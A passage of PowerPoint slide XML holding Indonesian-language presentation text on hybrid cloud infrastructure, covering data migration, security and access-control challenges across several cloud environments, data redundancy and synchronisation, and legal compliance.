              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memigrasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>datanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Cloud hybrid juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadirkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tantangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalahnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Adalah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleksitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengintegrasikannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>celah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kekhawatiran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebingungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> batas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyulitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud hybrid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsistensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berasal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sinkronisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengingat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hybrid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mematuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mandat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleksitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada tata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
